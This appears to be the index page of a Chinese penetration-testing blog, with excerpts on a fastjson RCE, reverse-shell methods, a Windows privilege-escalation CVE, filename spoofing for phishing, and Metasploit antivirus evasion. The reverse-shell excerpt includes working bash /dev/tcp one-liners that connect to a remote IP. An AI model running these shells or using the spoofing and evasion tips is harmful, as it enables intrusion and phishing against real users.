fastjson<1.2.47 RCE 漏洞复现

这两天爆出了 fastjson 的老洞,复现简单记录一下。 首先使用 spark 搭建一个简易的利用 fastjson 解析 json 的 http server。 ...

七月 15, 2019 · 1 分钟

反弹shell以及端口转发的方法收集

Bash 1 bash -i >& /dev/tcp/192.168.1.142/80 0>&1 1 2 3 4 exec 5<>/dev/tcp/192.168.1.142/80 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done ...

八月 23, 2018 · 1 分钟

CVE-2018-8120 Windows权限提升

来源 : bigric3/cve-2018-8120 Detail : cve-2018-8120-analysis-and-exploit ...

五月 18, 2018 · 1 分钟

从右向左覆盖实现恶意软件扩展名欺骗

这个技术虽然老掉牙,但在网络钓鱼中非常好用 ...

十月 24, 2017 · 1 分钟

关于msf反弹后门的免杀Tips

msf是一个很强大的工具,我经常会在渗透用它来反弹shell,不过它生成的反弹后门会被不少杀软kill,这篇文章只是讲讲我在msf中一个简单的免杀小技巧 ...

四月 20, 2017 · 2 分钟